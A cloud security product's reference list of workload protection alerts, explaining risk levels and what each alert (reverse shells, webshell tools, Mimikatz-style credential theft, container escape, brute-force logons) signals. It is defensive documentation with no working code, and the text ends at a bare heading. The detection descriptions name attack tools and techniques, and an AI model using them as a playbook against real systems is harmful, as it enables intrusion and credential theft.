Security Center:Overview of CWPP (Cloud Workload) security alerts

Risk level

Description

Recommended action

Urgent

• The behavior is highly similar to known attacker behavior and may cause destructive or persistent impact on assets, such as a reverse shell.

• This level indicates that the asset is very likely under attack.

Respond immediately. Recommended actions: quarantine the asset, block suspicious network connections, and preserve the attack scene.

Suspicious

• The behavior has potential risks but may be similar to some O&M operations, such as "suspicious user addition".

• The behavior is a non-critical step in the attack path, such as "clearing attack traces".

• This level indicates a certain probability that the asset is under attack.

Requires analysis. Check if it is a planned O&M operation. If yes, add the behavior to the whitelist. If not, handle it as an urgent alert.

Reminder

The alert behavior is a non-essential step in the attack path and is similar to normal O&M behavior, such as "suspicious port listening behavior".

Audit and optimize. Use this to find non-compliant configurations or potential risks. Periodically review and optimize security policies. Immediate action is not required.

Alert name

Description

DDoS Trojan

The detection model found a DDoS Trojan running on your server. A DDoS Trojan is a malicious program that receives instructions from a compromised host to launch DDoS attacks against a target specified by an attacker.

Ransomware

The detection model found ransomware running on your server. Ransomware is a malicious program that encrypts all critical data files on a host to demand a ransom.

Backdoor program

The detection model found a backdoor program running on your server. A backdoor program is a persistent program implanted in the system that allows an attacker to maintain continuous access to the host.

Malicious program

A cloud scan detected a malicious program.

Infectious virus

The detection model found an infectious virus running on your server. An infectious virus is an advanced malicious program where the virus injects malicious code into normal program files. As a result, many normal programs become infected and are detected as malicious.

Mining program

The detection model found a mining program running on your server. A mining program is a program that seizes host computing resources to mine virtual currency. This activity often results in high CPU usage and the presence of other related malicious programs on the host.

Trojan program

The detection model found a Trojan program on your server. A Trojan program is specifically designed to infiltrate a user's host. It typically disguises itself to be implanted into the system and then downloads and runs other malicious programs.

Worm

The detection model found a worm running on your server. A worm is a program used for lateral movement attacks from a compromised host to other hosts. A worm often performs activities such as exploiting vulnerabilities and cracking passwords.

Suspicious program

The detection model found a suspicious program running on your server. A suspicious program is a program that has malicious code characteristics or exhibits highly suspicious behavior but is not yet clearly classified. You must evaluate the program based on the information provided.

Self-mutating Trojan

The detection model found a self-mutating Trojan running on your server. A self-mutating Trojan is a Trojan program with self-mutation capabilities that changes its own hash or copies itself to many different paths and runs in the background to evade detection and cleanup.

Malicious IP blocking

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Malicious DNS request blocking

Alibaba Cloud Security detected that your ECS instance is communicating with a malicious domain name. This may indicate that an attacker has compromised your server. Precise Defense successfully blocked this network request to prevent damage to the server.

Process behavior blocking

A high-risk command was detected. This may be a malicious action by an attacker on a compromised server. Security Center's Precise Defense feature successfully blocked this malicious command to prevent damage to the server.

Malicious disruption of client process

Suspicious process modification behavior that disrupts the normal operation of the client was detected. This action was proactively blocked to prevent the behavior from undermining real-time threat detection. Attackers often disrupt security measures to compromise a host. Pay close attention to this alert. Check for other security alerts, high-risk vulnerabilities, or weak password risks on the server. If you initiated this action, you can ignore this alert.

Malicious disruption of client file

Suspicious file modification behavior that disrupts the normal operation of the client was detected. This action was proactively blocked to prevent the behavior from undermining real-time threat detection. Attackers often disrupt security measures to compromise a host. Pay close attention to this alert. Check for other security alerts, high-risk vulnerabilities, or weak password risks on the server. If you initiated this action, you can ignore this alert.

Exploit program

The detection model found an exploit program running on your server. An exploit program is used to attack known vulnerabilities in the operating system or applications to achieve objectives such as privilege escalation, container escape, or arbitrary code execution.

Bait capture for ransomware protection

A pre-set bait file was used to detect or block a suspicious ransomware process in the system.

Webshell malicious connection blocking

A malicious webshell connection was blocked.

Hacking tool

The detection model found a hacking tool on your server. Hacking tools are used by attackers during an intrusion for privilege escalation, sensitive data theft, or security software uninstallation. It can also be implanted as a backdoor program after an intrusion.

Windows backdoor account logon session blocking

An attempt by an attacker to log on to this machine with a backdoor account was detected. Security Center blocked this logon attempt.

Process start blocking (custom)

Security Center lets you add the MD5 hash of process files. Proactive defense uses the MD5 hash to block the process at startup.

AntSword webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Cknife webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Rootkit

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own traces or the traces of other malicious programs.

XISE webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Reverse shell

A reverse shell is a method that attackers use to control a victim server. This alert is triggered by reverse shells that are implemented by processes such as bash, python, perl, lua, php, and telnet.

Unauthorized execution of high-risk commands

An attacker elevates their privileges on a victim server by exploiting vulnerabilities or misconfigurations, such as the Dirty COW vulnerability or sudo privilege escalation.

Webshell command execution

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Counteracting security software

An attacker attempts to disable security software or delete security configurations. Examples include stopping the Server Guard program or disabling the firewall.

Implanting suspicious files

An attacker exploits a vulnerability or uses a weak password to log on and write suspicious files using commands such as wget, curl, tar, and powershell.

Implanting malicious files

An attacker exploits a vulnerability or uses a weak password to log on and write malicious files using commands such as wget, curl, tar, and powershell.

Suspicious worm script behavior

An attacker exploits a vulnerability or uses a weak password to log on and implant a suspicious worm script. This alert is triggered by scripts such as bash, python, perl, and powershell.

Downloading and running malicious files from the command line

An attacker exploits a vulnerability or uses a weak password to log on, remotely execute commands, and download and implant malicious files. This alert is triggered by download commands such as wget, curl, python, and powershell.

High-risk operation by a web service

An attacker exploits a web vulnerability, such as a Confluence or Exiftool vulnerability, to execute arbitrary commands.

Information gathering

A service program executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

Cloud Assistant advanced protection

The Cloud Assistant token may be leaked or stolen. This protection prohibits Cloud Assistant from executing arbitrary commands.

Suspicious network connection

An attacker runs a malicious program or uses a system program to connect to the network, receive instructions from a control end, and thereby control the victim server. This behavior is associated with DDoS attacks, mining programs, reverse shells, and more.

Obfuscated command

An attacker encrypts, encodes, or otherwise manipulates host commands to bypass antivirus protection. Examples of manipulation include using base64 or other encoding methods.

High-risk command execution by PowerShell

An attacker uses the system's PowerShell component to execute malicious commands. These commands can include malicious behaviors such as downloading or executing a payload.

Suspicious command execution by PowerShell

An attacker uses the system's PowerShell component to execute malicious commands. These commands can include malicious behaviors such as downloading or executing a payload.

High-risk operation by a browser service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

Suspicious operation by an entry service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by a system process

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by a Java service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by an Office component

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

Loading a high-risk driver

A virus, Trojan, or hacking tool bypasses antivirus protection by loading a driver module.

High-risk account manipulation behavior

An attacker performs unauthorized account operations to achieve persistence.

Malicious command execution

An attacker calls system tools to execute commands or scripts that perform various malicious behaviors.

Suspicious process startup

A suspected virus or Trojan started a process.

System backup deletion behavior

Ransomware was detected deleting system backups to prevent data restoration.

Internal network scan

An attacker expands the scope of an intrusion by scanning for weaknesses in internal network assets or by attempting to log on with the same password. This includes activities such as brute-force attacks, password spraying, and web vulnerability scanning.

Creating a service auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a high-risk auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a scheduled task auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a registry auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a WMI auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Clearing intrusion traces

An attacker attempts to destroy intrusion traces by deleting system logs, command execution records, or other data.

High-risk credential theft behavior

An attacker attempts to steal logon credentials using credential theft tools such as Mimikatz.

HashDump attack

An attacker uses memory dump tools such as Procdump to attempt to access the Local Security Authority (LSA) process and obtain credential data.

Hijacking a dynamic-link library

Security Center found that a system program is loading a suspicious dynamic-link library file or has implanted a malicious dynamic-link library file. This is suspected to be an attacker hijacking a dynamic-link library file to hijack system functions. Security Center has successfully blocked this behavior. If you believe this block was a false positive, you can disable the "Hijack dynamic-link library" ruleset on the Proactive Defense - Malicious Behavior Defense page or remove the affected machine from the managed hosts.

Cknife webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Behinder webshell communication

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Godzilla webshell communication

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Sensitive registry key protection

Protection for sensitive registry keys, including defense for persistent startup items, group policy configuration items, system security configuration items, and image file execution options hijacking.

Process injection protection

An attacker injects malicious code into a normal process to bypass detection and defense. An example is a ptrace injection.

Proxy tool

The detection model found a proxy tool on the host. Proxy tools are used by attackers for operations such as proxying and tunneling, often in scenarios of further server intrusion.

Cloud Assistant service information gathering

The Cloud Assistant service executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

LSA security authority service protection

The Local Security Authority Subsystem Service (LSASS) is the process responsible for the operating system's security policies. Attackers can perform malicious actions by reading from or writing to the LSASS process memory. This protection rule prohibits any process from opening the LSASS process with VM_READ or VM_WRITE permissions. Note: This protection capability is a security hardening feature that blocks by default and does not generate alerts. If your business requires reading from or writing to the LSASS process memory, you can disable this protection rule.

Entry service implants suspicious script or binary file

A database, web, or other service was detected implanting a suspicious script or binary file.

Entry service executes suspicious behavior sequence

An attacker uses an entry service to perform a series of malicious operations, such as executing download commands, reading and writing files, and gathering information, all under the same parent process.

Adaptive webshell communication blocking

The detection model found malicious webshell communication traffic on your server. An attacker can use this method for remote control of the server. Precise Defense successfully blocked this network request to prevent damage to the server.

Webshell upload

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Scanner

The detection model found a scanner on the host. Scanners are often used by attackers to discover live hosts, open ports, and hosts with security risks such as vulnerabilities and weak passwords. This is often done to facilitate further intrusions.

Java general RCE vulnerability blocking

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Adaptive web attack defense

Security Center uses a cloud-based intelligent analysis engine to automatically identify and block various web remote command execution (RCE) attack traffic to prevent malicious requests from damaging your server. If you believe this block was a false positive, you can disable the corresponding rule on the Proactive Defense - Malicious Behavior Defense page or remove the affected machine from the managed hosts.

Downloader Trojan

The detection model found a downloader Trojan on your server. A downloader Trojan typically downloads and runs third-party programs such as malicious Trojans and adware.

Host defense link test

This alert is used to test whether the host defense link is effective.

Database service information gathering

A database service program executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

Alibaba Cloud Security process protection

Abnormal access protection for Alibaba Cloud Security processes.

Webshell file defense

Security Center found a webshell on your server, and an attacker is attempting to use it. The defense module identified and precisely defended against this behavior. Note that although the defense module successfully blocked the action, if you confirm that this file is a backdoor, you must manually quarantine or delete it as soon as possible. To add this file to a whitelist, go to Mitigation Settings > Host Protection > Host Rule Management > Custom Defense Rules and create a whitelist rule for this file path. To disable the webshell file defense feature, go to Mitigation Settings > Host Protection > Host Rule Management > System Defense Rules > Webshell File Defense and turn off the switch.

SQL Server brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

PHP webshell upload

An attacker uses the file upload feature to upload a PHP webshell. Security Center blocks the upload of files with .php and .phtml extensions.

JSP webshell upload

An attacker uses the file upload feature to upload a JSP webshell. Security Center blocks the upload of files with the .jsp extension.

ASP webshell upload

An attacker uses the file upload feature to upload an ASP webshell. Security Center blocks the upload of files with .asp, .ashx, .asa, .asmx, and .cshtml extensions.

Webshell upload with special extension

An attacker uses the file upload feature to upload a webshell with a special extension. Security Center blocks the upload of files with .cer and .ascx extensions.

Operating system account behavior

This ruleset blocks operating system account behavior at the system's core. It is disabled by default. You can evaluate and enable it as needed.

Webshell upload intelligent defense

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Suspicious file upload via interface

An attacker uses certain interfaces to upload a suspicious webshell. Security Center blocks the upload feature of these interfaces.

Information-stealing tool

The detection model found an information-stealing tool on the host. Information-stealing tools are often used to steal various sensitive files and information from a host.

System persistent process access protection

System persistent processes and services carry the core functions of the system. Attackers often access system processes with high-risk permissions to carry out their malicious actions. This protection rule prohibits any process from accessing system persistent processes with high-risk permissions. This includes thread creation, handle copying, and memory operations. Note: This protection capability is a security hardening feature that blocks by default and does not generate alerts. If your business requires access to system persistent processes, you can disable this protection rule.

RDP brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

SSH brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Malicious driver

An attacker installs a rootkit by installing or compiling malicious code, loading .ko or .sys driver files, or using other methods.

Ransomware

A suspicious file was found on your system disk. We recommend that you confirm the legitimacy of the file before you handle it.

Non-trusted process startup

The startup of a process that is not on the whitelist was blocked.

Anomalous startup of a non-trusted process chain

The anomalous startup of processes in a non-trusted process chain was blocked.

High-risk network operation by a non-trusted process

A process that is not on the whitelist was blocked from anomalously accessing public or internal network IP addresses.

High-risk file operation by a non-trusted process

A high-risk operation by a process that is not on the whitelist was blocked. An example is anomalously modifying office documents or critical system configuration files.

Network request blocking

An anomalous network request was detected. Precise Defense successfully blocked the request to prevent damage to the host. This alert does not mean that the host has been compromised.

Alert name

Description

Reverse shell

Security Center detected that a reverse shell command was executed on your server. An attacker used this method to establish a reverse network connection with their own server, through which arbitrary commands can be executed.

Anomalous command execution in a Java application

The detection model found that a Java process on your server initiated high-risk behaviors such as downloading malicious programs or adding backdoors. This is likely because you use a vulnerable web framework or middleware.

Anomalous command execution in MySQL

The detection model found that your MySQL service executed a suspicious command. This may be because of a weak password in the MySQL service or an SQL injection in a web service.

Anomalous command execution in a PostgreSQL application

The detection model found that your PostgreSQL service executed a suspicious command. This may be because of a weak password in the PostgreSQL service or an SQL injection in a web service.

Exploitation due to misconfigured Redis

The detection model found that the Redis application on your server wrote a suspicious file to the disk. This may be because an attacker executed a malicious SQL command through a blank or weak Redis password, which could give the attacker direct access to the server.

Suspicious writing of a passwordless logon certificate

Alibaba Cloud Security detected an anomalous file change in the server's root certificate directory. This may be an attacker attempting to inject a passwordless certificate into the server for subsequent logon attacks.

Suspicious information leak via HTTP tunnel

The detection model found behavior on your server where the result of a command execution was sent to an external server via an HTTP channel. This may be an attacker returning the result of a command executed through a remote command execution (RCE) vulnerability to their own server.

Suspicious UDF library file written by misusing the Postgres export function

The detection model found that the Postgres application on your server is attempting to write a suspicious .so file to the disk. This may be because an attacker logged in with a weak Postgres password and executed a malicious SQL command. This file could allow the attacker to control your server.

Suspicious file written by misusing the MySQL export function

The detection model found that the MySQL application on your server is attempting to write a file to a sensitive directory. This may be because an attacker executed a malicious SQL command through a weak password or a web application.

Suspicious CMD command sequence

The detection model found that a process on your system executed a series of suspicious commands. These commands are very similar to the command sequences typically executed by an attacker after an intrusion. We recommend that you investigate the parent process of these commands, which could be a remote control Trojan, a vulnerable web service, or a legitimate process injected with malicious code.

Anomalous operation on a Windows account

The detection model found that the context in which this command was operating on the system account is suspicious. This may be a user account operation by malware or an attacker.

Suspicious script operation

The detection model found that this command on your machine is related to a script and is highly suspicious. It is very likely related to malware or a cyberattack.

Anomalous registry operation

The detection model found that the way this command operates on the registry on your machine is highly suspicious. It may be a configuration modification by malware or an attacker after an intrusion.

Suspicious command execution

The detection model found that the command line of a process executed on your server is highly suspicious. It is very likely related to a Trojan, virus, or hacking behavior.

Suspicious obfuscated command in Windows

The command line executed on the host was detected to be likely obfuscated. Malware execution or hacking processes often use case variations or special characters to obfuscate the command line to bypass security detection.

Suspicious process path

The detection model found that a process on your server started from an unusual path. Regular software is not typically located in such directories. This process could be a virus, a Trojan, or a tool placed during a cyberattack.

Suspicious encoded command

The detection model found that the command line of a process executed on your server is highly suspicious. It is very likely related to a Trojan, virus, or hacking behavior.

Suspicious command sequence in Linux

The detection model found that a process on your system executed a series of suspicious commands. These commands are very similar to the command sequences typically executed by an attacker after an intrusion. We recommend that you investigate the parent process of these commands, which could be a reverse shell, a remote control Trojan, a vulnerable web service, or a legitimate process injected with malicious code.

Anomalous deletion of system logs

The detection model found a process on your system attempting to delete system logs. Malware or attackers often clear system logs to evade detection.

Anomalous deletion of system backups

The detection model found a process on your system attempting to delete system backup files. This could be ransomware trying to prevent file restoration to extort a ransom.

Anomalous modification of system security configuration

The detection model found a process on your machine that modified the system security configuration. This could be malware or an attacker modifying firewall or antivirus software configurations to evade detection.

Anomalous call to a system tool

The detection model found a process on your system calling a system tool in a suspicious manner. Trojans or attackers often use this method to bypass conventional security software to perform malicious actions such as downloading malicious files, encrypting or decrypting data, or loading malicious code.

Anomalous modification of a startup item

The detection model found a process on your machine attempting to modify the system's auto-start items. This could be a Trojan or an attacker using startup items to maintain persistence.

Suspicious probing command

Suspicious probing command.

Suspicious command execution inside a container

The detection model found anomalous command execution inside your container, which indicates an intrusion risk.

Running a malicious container image

The detection model found that your server is running a malicious container image. This image is highly likely to contain a backdoor, mining program, virus, or known severe vulnerabilities. Investigate and use trusted image resources promptly.

Privilege escalation or escape inside a container

Security Center detected suspicious behaviors such as attempts at privilege escalation or escape inside the container. This is common in actions like accessing docker.sock, using escape tools, or creating cgroups. There is also a chance that this is a normal business operation. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Privileged container startup

The detection model found a suspicious privileged container starting on your server. Privileged containers reduce the security of the container runtime. If compromised, they can endanger other containers and assets on the host server. Ensure that your privileged containers use trusted image sources and that their running services are difficult to compromise.

Risky Docker remote debugging interface

The detection model found that your Docker remote debugging interface is open to 0.0.0.0. A Docker remote debugging interface exposed to the public network will be quickly compromised by worms. Exposing it only to the internal network also carries some risk, because it is often used by attackers for lateral movement after breaking into the internal network, exploiting this dangerous configuration to control more container resources.

Suspected privilege escalation

The detection model found a process on your server that appears to be exploiting system or application vulnerabilities to gain higher privileges. This may be a privilege escalation attempt by an attacker during an intrusion.

Anomalous container behavior

Security Center detected manual operations inside your container, such as installing software, executing scripts, or probing the container environment. This is common in lateral penetration and privilege escalation by attackers after compromising a container. There is also a chance that it is a normal business or O&M requirement. If you find this alert to be a false positive, you can select "Add to whitelist" or "Ignore" on the alert handling page.

Container initiating network scanning behavior

The detection model found that your container is proactively initiating suspicious network scanning behavior. This may be a method used by an attacker for deep penetration and lateral movement.

Credential information gathering inside a container

The detection model found access to sensitive files inside your container, such as Docker, Swarm, or Kubernetes configuration files, database connection configurations, logon credentials, API AccessKeys, certificates, and private key files. Promptly confirm whether there has been an intrusion event and a risk of data breach.

High-risk container operation

The detection model found that your server is performing a high-risk container operation. See the alert details for the specific reason. Investigate this behavior. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

File time tampering

The detection model found a process on your server attempting to tamper with a file's timestamp. This may be an attacker trying to evade detection by mimicking normal system file times to forge the true creation, access, or modification times of an anomalous file.

Network proxy forwarding behavior

The detection model found an anomalous call to a risk tool on your server. Risk tools are used by attackers for proxies, tunnels, and scanning tools in scenarios of further server intrusion.

Masquerading as a Kubernetes system container

Security Center detected that a docker command was executed on your server to start a container masquerading as a Kubernetes internal service. This is common when attackers deploy a backdoor container and name it after a Kubernetes internal container to evade detection.

Sensitive manual operation inside a container

Security Center monitored manual operations inside your container, such as installing software, executing scripts, or probing the container environment. This is common when an attacker, after breaking into a container, needs to enrich the container's environment for lateral penetration. It is also seen during testing by O&M personnel. Please determine whether the behavior involved in this alert is an authorized operation. If it is an O&M operation, you can filter out this alert using a whitelist rule.

Suspicious probing command sequence in a container environment

Security Center detected a set of suspicious commands executed in a container environment. This is common when an attacker, after gaining access inside a container, probes the container's host environment, cluster information, and conditions for container escape to achieve privilege escalation and lateral movement. Because these actions are relatively minor, there is also a chance they are part of normal business or O&M requirements. Promptly investigate whether the source IP's access and operation on this resource are part of normal business or O&M requirements.

Worm command

Worm command.

Penetration tool exploitation behavior

Penetration tool exploitation behavior.

Calling a scanning tool

Calling a scanning tool.

Starting a suspicious image

Security Center found that your server started a container using a suspicious image. This is common in scenarios where an attacker exploits a service vulnerability to control container scheduling and implant malicious images for mining, backdoors, and more. Investigate promptly. If it is a normal business requirement, you can ignore it or mark it as a false positive. Security Center builds a malicious image intelligence library by real-time sensing of malicious image propagation on the cloud and analyzing public image repositories on the Internet. You can use the Image Scan feature to detect vulnerabilities, malicious files, and more in images.

Suspicious PowerShell instruction

Attackers often use PowerShell for malicious activities such as downloading malicious files, running malicious files persistently without dropping them to disk, and creating reverse shells.

Suspicious file implantation behavior

Suspicious file implantation behavior.

LSASS memory dump

The detection model found malware such as we and minikazi running on your server. This tool can extract system account hashes, which can lead to the leakage of your account passwords.

Extracting operating system identity credentials

(No specific detection principle is available.)

Suspicious process behavior sequence

A process was detected starting multiple suspicious child processes. This process could be a vulnerable application service being attacked by an attacker, or the process itself could be malicious.

Executing a file dynamically loaded from memory

Executing a file dynamically loaded from memory.

Suspected process injection

This process injected code into another process, possibly attempting to run code in the context of the other process to bypass detection, escalate privileges, or access sensitive information in memory.

We recommend that you take the following measures:

1. Check the process and target process files. If they are not legitimate files, kill the process and quarantine the file. If it is a legitimate process, restart or kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Web application creates anomalous child process

(No specific detection principle is available.).

Suspected internal network lateral attack

Suspected internal network lateral attack.

Persistence backdoor creation behavior

Persistence backdoor creation behavior.

Persistence backdoor startup behavior

Persistence backdoor startup behavior.

Process command line obfuscation

The command line of a process on the host was detected to contain obfuscated encoding, which is very likely a malicious program or an attacker attempting to bypass security detection.

Cloud environment information collection

Cloud environment information collection.

Executing an anomalous scheduled task

A suspicious process was detected being created by the system's scheduled task component. This could be because a malicious program or an attacker, after gaining host access, added malicious code to a scheduled task to maintain persistence.

SSH backdoor

A backdoor process related to Secure Shell (SSH) was detected. After gaining access to a Linux host, a malicious program or attacker may modify related files or configurations to leave a logon backdoor through the SSH program.

Editor extension backdoor

A suspected backdoor program related to an editor extension component was found. A malicious program or attacker may use the extension functionality of a normal editor to hide a backdoor program.

Suspected escape by file tampering

Security Center detected the action of opening an important file in "write mode". This is common in scenarios of escaping from a container to the host by tampering with the file. You can focus on investigating whether the process, the operated file, and the file's opening properties originate from normal business operations. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Requesting an out-of-band (OOB) attack domain name

A process on the host was detected requesting a domain name that is often used for out-of-band data exfiltration. Attackers often specify in a payload that a target domain name should be requested upon successful exploitation. They then determine whether the attack was successful by observing whether the specific domain name was requested.

Anomalous pseudo-terminal shell creation behavior

(No specific detection principle is available.)

Accessing a suspicious mining pool domain name

A process on the host was detected requesting a suspicious mining pool domain name. This means the machine may be communicating with a mining pool. Further investigate for mining behavior based on the alert and recommended actions.

Container escape program startup

The Usermode Helper API is a mechanism in the Linux kernel for calling a user-specified user-space program, such as a program specified through files like /proc/sys/kernel/core_pattern. When this program is executed, it has host root privileges. This kernel mechanism should generally not be used in a container. Therefore, when a program inside a container is called by the host kernel, it usually represents an escape behavior.

Windows token tampering for privilege escalation

Windows token tampering for privilege escalation

Accessing a suspicious tunnel domain name

A process on the host was detected requesting a suspicious tunnel domain name. This means the machine may be conducting tunnel proxy communication. Further investigate based on the alert and recommended actions.

Anomalous modification of a system file

Anomalous modification of a system file.

Modifying a registry auto-start item

Modifying a registry auto-start item.

Scheduled task modification behavior

Scheduled task modification behavior.

Suspicious system policy modification behavior

Suspicious system policy modification behavior.

Web application modifies anomalous file

Web application modifies anomalous file.

Parent process spoofing

Parent process spoofing.

Container mounts high-risk host path

Container mounts high-risk host path.

Hijacking control flow using an environment variable

Hijacking control flow using an environment variable.

Alert name

Description

Webshell file found

The detection model found a suspicious webshell file on your server. It may be a backdoor file implanted by an attacker to maintain access after successfully compromising a website.

Log or image file containing webshell code

The detection model found a file on your server with webshell code inserted. This may be an attacker attempting to exploit a file inclusion vulnerability.

Arbitrary file write backdoor found

Security Center found a file on your system disk that could lead to arbitrary file writing. This could have been implanted by an attacker after a successful network intrusion, or it could be an O&M file belonging to an administrator. We recommend that you first confirm the legitimacy of the file and handle it.

Information-stealing backdoor found

Security Center found a file on your system disk that could lead to information theft, such as a database operation log. This could have been implanted by an attacker after a successful network intrusion, or it could be an O&M file belonging to an administrator. We recommend that you first confirm the legitimacy of the file and handle it.

Trojan or hotlinking backdoor file found

The detection model found a suspicious Trojan file on your system disk. It may have been implanted by an attacker after successfully compromising a website. This file exhibits dangerous behaviors such as malicious redirection for traffic. We recommend that you first confirm the legitimacy of the file and handle it. If it was deployed by an administrator, you can choose to ignore it or mark it as a false positive in the console.

DLL-type web backdoor found

The detection model found a suspicious webshell file on your server. It may be a backdoor file implanted by an attacker to maintain access after successfully compromising a website.

Alert name

Description

Logon to an ECS instance from an unusual location

The logon location is outside the range of legitimate logon locations that you have defined. Please confirm the legitimacy of the logon.

Logon to an ECS instance from an unusual IP address

The logon IP address is outside the range of legitimate IP addresses that you have defined. Please confirm the legitimacy of the logon behavior.

Logon to an ECS instance with an unusual account

The logon account is outside the range of legitimate accounts that you have defined. Please confirm the legitimacy of the logon behavior.

Logon to an ECS instance at an unusual time

The logon time is outside the legitimate logon time range that you have defined. Please confirm the legitimacy of the logon behavior.

Successful brute-force attack on an ECS instance

Your ECS instance was successfully logged into after multiple failed password attempts. The system preliminarily determines that an attacker has guessed the password.

Successful brute-force attack on an ECS instance (SSH)

The detection model found that your server is under an SSH brute-force attack, and the attacker successfully logged into the system after guessing your SSH service password after a certain number of attempts.

Successful brute-force attack on an ECS instance (RDP)

The detection model found that your server is under an RDP brute-force attack, and the attacker successfully logged into the system after guessing your RDP service password after a certain number of attempts.

Anomalous command sequence executed after ECS logon (SSH)

The detection model found that after an IP address logged into your server, a series of malicious commands were executed. This is very likely because a weak or leaked server password was used by an attacker to log in and execute commands.

Anomalous account logon

The model found that you added an anomalous account to the administrator user group and detected that this account has logon activity. If this was not your action, delete this account as soon as possible.

Logon from a malicious IP address

The detection model found that your server was successfully logged into from a malicious IP address. This IP address has a history of malicious attack behavior. If this was not your logon, change the ECS password as soon as possible.

Backdoor account logon

The detection model found that a backdoor account previously implanted by an attacker on your server has just been successfully logged into. If this was not your action, delete this account as soon as possible.

Suspected external logon scanning activity

The detection model found that your server is frequently initiating outbound brute-force scanning of protocols such as SSH, RDP, and SMB. This may be because your server has been compromised by an attacker and is being used as a springboard to attack other machines.

Successful brute-force attack on an ECS instance (multiple invalid users)

The detection model found that an IP address attempted to log in to your server with multiple invalid usernames and eventually succeeded. If this was not your logon, change the ECS password as soon as possible.

Logon from a malicious IP address (MySQL)

The detection model found that the MySQL application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the MySQL password as soon as possible.

Logon from a malicious IP address (FTP)

The detection model found that the FTP application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the FTP password as soon as possible.

Logon from a malicious IP address (SQL Server)

The detection model found that the SQL Server application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the SQL Server password as soon as possible.

Alert name

Description

Trojan program

The detection model found a Trojan program on your server. A Trojan program is specifically designed to infiltrate a user's host. It typically disguises itself to be implanted into the system and then downloads and releases other malicious programs.

Suspicious C2 Trojan communication

Malicious C2 Trojan program.

DDoS Trojan

The detection model found a DDoS Trojan running on your server. A DDoS Trojan is a malicious program that receives instructions from a compromised host to launch DDoS attacks against a target specified by an attacker.

Ransomware

The detection model found ransomware running on your server. Ransomware is a malicious program that encrypts all critical data files on a host to demand a ransom.

Backdoor program

The detection model found a backdoor program running on your server. A backdoor program is a persistent program implanted in the system that allows an attacker to maintain continuous access to the host.

Infectious virus

The detection model found an infectious virus running on your server. An infectious virus is an advanced malicious program where the virus body injects malicious code into normal program files for execution. As a result, many normal programs become infected and are detected as hosts.

Worm

The detection model found a worm running on your server. A worm is a program used for lateral movement attacks from a compromised host to other hosts. It often involves activities such as vulnerability exploits and password cracking.

Malicious program

The detection model found a malicious program running on your server. A malicious program is a program that has a variety of malicious behavior characteristics, or a third-party program that causes disruption or damage.

Mining program

The detection model found a mining program running on your server. A mining program is a program that seizes host computing resources to mine virtual currency. This often results in high CPU usage and the presence of other related malicious programs on the host.

Suspicious program

The detection model found a suspicious program running on your server. A suspicious program typically has some malicious code characteristics or highly suspicious behaviors and is not yet clearly classified. You need to evaluate it based on the provided information.

High-risk program

Cloud scan (high-risk program).

Self-mutating Trojan

The detection model found a self-mutating Trojan running on your server. A self-mutating Trojan is a Trojan program with self-mutation capabilities. It changes its own hash or copies itself to many different paths and runs in the background to evade cleanup.

Tainted basic software

The detection model found tainted basic software on your server. Tainted basic software is a special type of malicious program, usually a normal system program into which malicious code has been injected. Although it retains the functionality of the original basic software, it has hidden malicious behaviors.

Exploit program

The detection model found an exploit program running on your server. An exploit program is used to attack or attempt to attack known vulnerabilities in the operating system or applications to achieve privilege escalation, escape, arbitrary code execution, and other objectives.

Hacking tool

